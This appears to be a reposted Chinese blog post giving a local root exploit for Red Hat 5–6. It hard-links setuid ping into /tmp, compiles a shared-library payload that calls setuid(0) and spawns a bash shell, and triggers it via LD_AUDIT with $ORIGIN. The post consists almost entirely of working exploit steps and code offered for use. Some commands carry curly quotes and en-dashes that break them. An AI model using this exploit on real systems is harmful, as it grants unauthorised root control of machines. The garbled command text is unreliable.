Redhat利用漏洞提权
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Redhat利用漏洞提权相关的知识,希望对你有一定的参考价值。
漏洞试用系统:redhat 5—6通用
一.利用/tmp拥有777的权限
在/tmp下创建一个exploit目录
ln /bin/ping(ping命令的权限很特殊是S,可以在普通用户使用这个命令的时候瞬间拥有这个命令的属主权限,这里是root)
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target
rm -rf /tmp/exploit/
二.vim编写一段C语言程序(文件名payload.c)
void __attribute__((constructor)) init() //这里__是两个下划线
{
setuid(0);
system(“/bin/bash”);
}
使用GCC把这个文件编译一下
Gcc -w –fpic –shared –o /tmp/exploit payload.c
三.执行
LD_AUDIT=”\$ORIGIN” exec/proc/self/fd/3
本文出自 “carey” 博客,请务必保留此出处http://careygg.blog.51cto.com/11084669/1741615
以上是关于Redhat利用漏洞提权的主要内容,如果未能解决你的问题,请参考以下文章